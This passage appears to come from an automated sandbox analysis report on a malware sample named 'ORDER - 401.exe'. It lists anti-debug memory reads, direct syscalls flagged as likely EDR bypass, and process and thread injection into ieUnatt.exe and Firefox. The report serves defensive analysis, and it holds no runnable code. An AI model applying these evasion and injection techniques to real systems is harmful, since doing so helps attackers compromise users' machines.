                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0109C810 mov eax, dword ptr fs:[00000030h]5_2_0109C810
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010B483A mov eax, dword ptr fs:[00000030h]5_2_010B483A
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010B483A mov eax, dword ptr fs:[00000030h]5_2_010B483A
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0104A830 mov eax, dword ptr fs:[00000030h]5_2_0104A830
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01032835 mov eax, dword ptr fs:[00000030h]5_2_01032835
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01032835 mov eax, dword ptr fs:[00000030h]5_2_01032835
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01032835 mov eax, dword ptr fs:[00000030h]5_2_01032835
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01032835 mov ecx, dword ptr fs:[00000030h]5_2_01032835
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01032835 mov eax, dword ptr fs:[00000030h]5_2_01032835
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01032835 mov eax, dword ptr fs:[00000030h]5_2_01032835
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01022840 mov ecx, dword ptr fs:[00000030h]5_2_01022840
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01040854 mov eax, dword ptr fs:[00000030h]5_2_01040854
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01014859 mov eax, dword ptr fs:[00000030h]5_2_01014859
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01014859 mov eax, dword ptr fs:[00000030h]5_2_01014859
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010A6870 mov eax, dword ptr fs:[00000030h]5_2_010A6870
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010A6870 mov eax, dword ptr fs:[00000030h]5_2_010A6870
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0109E872 mov eax, dword ptr fs:[00000030h]5_2_0109E872
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0109E872 mov eax, dword ptr fs:[00000030h]5_2_0109E872
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01010887 mov eax, dword ptr fs:[00000030h]5_2_01010887
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0109C89D mov eax, dword ptr fs:[00000030h]5_2_0109C89D
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0103E8C0 mov eax, dword ptr fs:[00000030h]5_2_0103E8C0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010DA8E4 mov eax, dword ptr fs:[00000030h]5_2_010DA8E4
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0104C8F9 mov eax, dword ptr fs:[00000030h]5_2_0104C8F9
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0104C8F9 mov eax, dword ptr fs:[00000030h]5_2_0104C8F9
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0108EB1D mov eax, dword ptr fs:[00000030h]5_2_0108EB1D
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0108EB1D mov eax, dword ptr fs:[00000030h]5_2_0108EB1D
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0108EB1D mov eax, dword ptr fs:[00000030h]5_2_0108EB1D
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0108EB1D mov eax, dword ptr fs:[00000030h]5_2_0108EB1D
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0108EB1D mov eax, dword ptr fs:[00000030h]5_2_0108EB1D
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0108EB1D mov eax, dword ptr fs:[00000030h]5_2_0108EB1D
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0108EB1D mov eax, dword ptr fs:[00000030h]5_2_0108EB1D
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0108EB1D mov eax, dword ptr fs:[00000030h]5_2_0108EB1D
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0108EB1D mov eax, dword ptr fs:[00000030h]5_2_0108EB1D
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0103EB20 mov eax, dword ptr fs:[00000030h]5_2_0103EB20
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0103EB20 mov eax, dword ptr fs:[00000030h]5_2_0103EB20
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010D8B28 mov eax, dword ptr fs:[00000030h]5_2_010D8B28
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010D8B28 mov eax, dword ptr fs:[00000030h]5_2_010D8B28
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010C4B4B mov eax, dword ptr fs:[00000030h]5_2_010C4B4B
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010C4B4B mov eax, dword ptr fs:[00000030h]5_2_010C4B4B
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010B8B42 mov eax, dword ptr fs:[00000030h]5_2_010B8B42
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010A6B40 mov eax, dword ptr fs:[00000030h]5_2_010A6B40
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010A6B40 mov eax, dword ptr fs:[00000030h]5_2_010A6B40
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010DAB40 mov eax, dword ptr fs:[00000030h]5_2_010DAB40
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010BEB50 mov eax, dword ptr fs:[00000030h]5_2_010BEB50
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0100CB7E mov eax, dword ptr fs:[00000030h]5_2_0100CB7E
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01020BBE mov eax, dword ptr fs:[00000030h]5_2_01020BBE
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01020BBE mov eax, dword ptr fs:[00000030h]5_2_01020BBE
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010C4BB0 mov eax, dword ptr fs:[00000030h]5_2_010C4BB0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010C4BB0 mov eax, dword ptr fs:[00000030h]5_2_010C4BB0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01030BCB mov eax, dword ptr fs:[00000030h]5_2_01030BCB
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01030BCB mov eax, dword ptr fs:[00000030h]5_2_01030BCB
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01030BCB mov eax, dword ptr fs:[00000030h]5_2_01030BCB
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01010BCD mov eax, dword ptr fs:[00000030h]5_2_01010BCD
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01010BCD mov eax, dword ptr fs:[00000030h]5_2_01010BCD
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01010BCD mov eax, dword ptr fs:[00000030h]5_2_01010BCD
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010BEBD0 mov eax, dword ptr fs:[00000030h]5_2_010BEBD0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01018BF0 mov eax, dword ptr fs:[00000030h]5_2_01018BF0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01018BF0 mov eax, dword ptr fs:[00000030h]5_2_01018BF0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01018BF0 mov eax, dword ptr fs:[00000030h]5_2_01018BF0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0109CBF0 mov eax, dword ptr fs:[00000030h]5_2_0109CBF0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0103EBFC mov eax, dword ptr fs:[00000030h]5_2_0103EBFC
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0109CA11 mov eax, dword ptr fs:[00000030h]5_2_0109CA11
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0104CA24 mov eax, dword ptr fs:[00000030h]5_2_0104CA24
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0103EA2E mov eax, dword ptr fs:[00000030h]5_2_0103EA2E
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01034A35 mov eax, dword ptr fs:[00000030h]5_2_01034A35
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01034A35 mov eax, dword ptr fs:[00000030h]5_2_01034A35
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0104CA38 mov eax, dword ptr fs:[00000030h]5_2_0104CA38
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01016A50 mov eax, dword ptr fs:[00000030h]5_2_01016A50
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01016A50 mov eax, dword ptr fs:[00000030h]5_2_01016A50
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01016A50 mov eax, dword ptr fs:[00000030h]5_2_01016A50
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01016A50 mov eax, dword ptr fs:[00000030h]5_2_01016A50
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01016A50 mov eax, dword ptr fs:[00000030h]5_2_01016A50
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01016A50 mov eax, dword ptr fs:[00000030h]5_2_01016A50
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01016A50 mov eax, dword ptr fs:[00000030h]5_2_01016A50
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01020A5B mov eax, dword ptr fs:[00000030h]5_2_01020A5B
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01020A5B mov eax, dword ptr fs:[00000030h]5_2_01020A5B
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0104CA6F mov eax, dword ptr fs:[00000030h]5_2_0104CA6F
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0104CA6F mov eax, dword ptr fs:[00000030h]5_2_0104CA6F
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0104CA6F mov eax, dword ptr fs:[00000030h]5_2_0104CA6F
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010BEA60 mov eax, dword ptr fs:[00000030h]5_2_010BEA60
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0108CA72 mov eax, dword ptr fs:[00000030h]5_2_0108CA72
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0108CA72 mov eax, dword ptr fs:[00000030h]5_2_0108CA72
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0101EA80 mov eax, dword ptr fs:[00000030h]5_2_0101EA80
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0101EA80 mov eax, dword ptr fs:[00000030h]5_2_0101EA80
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0101EA80 mov eax, dword ptr fs:[00000030h]5_2_0101EA80
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0101EA80 mov eax, dword ptr fs:[00000030h]5_2_0101EA80
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0101EA80 mov eax, dword ptr fs:[00000030h]5_2_0101EA80
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0101EA80 mov eax, dword ptr fs:[00000030h]5_2_0101EA80
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0101EA80 mov eax, dword ptr fs:[00000030h]5_2_0101EA80
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0101EA80 mov eax, dword ptr fs:[00000030h]5_2_0101EA80
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0101EA80 mov eax, dword ptr fs:[00000030h]5_2_0101EA80
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010E4A80 mov eax, dword ptr fs:[00000030h]5_2_010E4A80
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01048A90 mov edx, dword ptr fs:[00000030h]5_2_01048A90
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01018AA0 mov eax, dword ptr fs:[00000030h]5_2_01018AA0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01018AA0 mov eax, dword ptr fs:[00000030h]5_2_01018AA0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01066AA4 mov eax, dword ptr fs:[00000030h]5_2_01066AA4
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01066ACC mov eax, dword ptr fs:[00000030h]5_2_01066ACC
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01066ACC mov eax, dword ptr fs:[00000030h]5_2_01066ACC
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01066ACC mov eax, dword ptr fs:[00000030h]5_2_01066ACC
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01010AD0 mov eax, dword ptr fs:[00000030h]5_2_01010AD0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01044AD0 mov eax, dword ptr fs:[00000030h]5_2_01044AD0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01044AD0 mov eax, dword ptr fs:[00000030h]5_2_01044AD0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0104AAEE mov eax, dword ptr fs:[00000030h]5_2_0104AAEE
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0104AAEE mov eax, dword ptr fs:[00000030h]5_2_0104AAEE
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0102AD00 mov eax, dword ptr fs:[00000030h]5_2_0102AD00
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0102AD00 mov eax, dword ptr fs:[00000030h]5_2_0102AD00
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0102AD00 mov eax, dword ptr fs:[00000030h]5_2_0102AD00
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01006D10 mov eax, dword ptr fs:[00000030h]5_2_01006D10
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01006D10 mov eax, dword ptr fs:[00000030h]5_2_01006D10
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01006D10 mov eax, dword ptr fs:[00000030h]5_2_01006D10
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01044D1D mov eax, dword ptr fs:[00000030h]5_2_01044D1D
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010C8D10 mov eax, dword ptr fs:[00000030h]5_2_010C8D10
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010C8D10 mov eax, dword ptr fs:[00000030h]5_2_010C8D10
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01098D20 mov eax, dword ptr fs:[00000030h]5_2_01098D20
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01010D59 mov eax, dword ptr fs:[00000030h]5_2_01010D59
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01010D59 mov eax, dword ptr fs:[00000030h]5_2_01010D59
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01010D59 mov eax, dword ptr fs:[00000030h]5_2_01010D59
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01018D59 mov eax, dword ptr fs:[00000030h]5_2_01018D59
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01018D59 mov eax, dword ptr fs:[00000030h]5_2_01018D59
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01018D59 mov eax, dword ptr fs:[00000030h]5_2_01018D59
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01018D59 mov eax, dword ptr fs:[00000030h]5_2_01018D59
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01018D59 mov eax, dword ptr fs:[00000030h]5_2_01018D59
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010A8D6B mov eax, dword ptr fs:[00000030h]5_2_010A8D6B
                Source: C:\Users\user\Desktop\ORDER - 401.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeNtQueryAttributesFile: Direct from: 0x76EF2E6CJump to behavior
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeNtQuerySystemInformation: Direct from: 0x76EF48CCJump to behavior
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeNtOpenSection: Direct from: 0x76EF2E0CJump to behavior
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeNtDeviceIoControlFile: Direct from: 0x76EF2AECJump to behavior
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BECJump to behavior
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeNtQueryInformationToken: Direct from: 0x76EF2CACJump to behavior
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeNtCreateFile: Direct from: 0x76EF2FECJump to behavior
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeNtOpenFile: Direct from: 0x76EF2DCCJump to behavior
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeNtOpenKeyEx: Direct from: 0x76EF2B9CJump to behavior
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeNtSetInformationProcess: Direct from: 0x76EF2C5CJump to behavior
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9CJump to behavior
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeNtNotifyChangeKey: Direct from: 0x76EF3C2CJump to behavior
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeNtCreateMutant: Direct from: 0x76EF35CCJump to behavior
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeNtResumeThread: Direct from: 0x76EF36ACJump to behavior
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeNtMapViewOfSection: Direct from: 0x76EF2D1CJump to behavior
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeNtProtectVirtualMemory: Direct from: 0x76EE7B2EJump to behavior
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFCJump to behavior
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeNtQuerySystemInformation: Direct from: 0x76EF2DFCJump to behavior
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeNtDelayExecution: Direct from: 0x76EF2DDCJump to behavior
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeNtQueryInformationProcess: Direct from: 0x76EF2C26Jump to behavior
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeNtAllocateVirtualMemory: Direct from: 0x76EF3C9CJump to behavior
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeNtSetInformationThread: Direct from: 0x76EE63F9Jump to behavior
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeNtClose: Direct from: 0x76EF2B6C
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeNtSetInformationThread: Direct from: 0x76EF2B4CJump to behavior
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeNtCreateKey: Direct from: 0x76EF2C6CJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\ORDER - 401.exeSection loaded: NULL target: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeSection loaded: NULL target: C:\Windows\SysWOW64\ieUnatt.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: NULL target: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: NULL target: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\ieUnatt.exeThread register set: target process: 5704Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\ieUnatt.exeThread APC queued: target process: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeProcess created: C:\Users\user\Desktop\ORDER - 401.exe "C:\Users\user\Desktop\ORDER - 401.exe"Jump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeProcess created: C:\Users\user\Desktop\ORDER - 401.exe "C:\Users\user\Desktop\ORDER - 401.exe"Jump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeProcess created: C:\Users\user\Desktop\ORDER - 401.exe "C:\Users\user\Desktop\ORDER - 401.exe"Jump to behavior
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeProcess created: C:\Windows\SysWOW64\ieUnatt.exe "C:\Windows\SysWOW64\ieUnatt.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: ZaZCnGdXtY.exe, 00000007.00000002.4676980802.0000000000E61000.00000002.00000001.00040000.00000000.sdmp, ZaZCnGdXtY.exe, 00000007.00000000.2396985465.0000000000E61000.00000002.00000001.00040000.00000000.sdmp, ZaZCnGdXtY.exe, 0000000A.00000000.2545863833.0000000001621000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                Source: ZaZCnGdXtY.exe, 00000007.00000002.4676980802.0000000000E61000.00000002.00000001.00040000.00000000.sdmp, ZaZCnGdXtY.exe, 00000007.00000000.2396985465.0000000000E61000.00000002.00000001.00040000.00000000.sdmp, ZaZCnGdXtY.exe, 0000000A.00000000.2545863833.0000000001621000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: ZaZCnGdXtY.exe, 00000007.00000002.4676980802.0000000000E61000.00000002.00000001.00040000.00000000.sdmp, ZaZCnGdXtY.exe, 00000007.00000000.2396985465.0000000000E61000.00000002.00000001.00040000.00000000.sdmp, ZaZCnGdXtY.exe, 0000000A.00000000.2545863833.0000000001621000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: ZaZCnGdXtY.exe, 00000007.00000002.4676980802.0000000000E61000.00000002.00000001.00040000.00000000.sdmp, ZaZCnGdXtY.exe, 00000007.00000000.2396985465.0000000000E61000.00000002.00000001.00040000.00000000.sdmp, ZaZCnGdXtY.exe, 0000000A.00000000.2545863833.0000000001621000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\ORDER - 401.exeQueries volume information: C:\Users\user\Desktop\ORDER - 401.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
